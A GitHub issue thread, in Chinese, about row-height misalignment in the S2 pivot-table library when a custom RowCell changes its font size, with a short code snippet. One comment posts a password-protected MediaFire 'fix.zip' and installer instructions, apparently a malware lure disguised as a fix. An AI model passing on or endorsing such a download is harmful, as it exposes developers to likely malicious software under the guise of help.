### ISSUE TITLE
🐛动态设置RowCell字体大小时，行高错位

### ISSUE THREAD

**Issue by machachong** [antvis/S2#2877]
### 🏷 Version

- [ ] PivotSheet

### 🖋 Description

自定义RowCell单元格样式，动态调整字体大小时，rowcell部分的单元格行高错位，其他CornerCell，ColCell等都是好的

### ⌨️ Code Snapshots

class CustomRowCell extends RowCell {
  getTextStyle() {
    const defaultTextStyle = super.getTextStyle();
    return {
      fontSize: 18, // 动态调整这里
    };
  }
}
![image](https://github.com/user-attachments/assets/970b4363-0b84-41bc-9011-cf16e965970c)

-->

| Environment | Info |
| ------- | ------- |
| System  |         |
| Browser |         |

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by lijinke666** [comment]
[提 issue 前必读](https://github.com/antvis/S2/issues/1904)
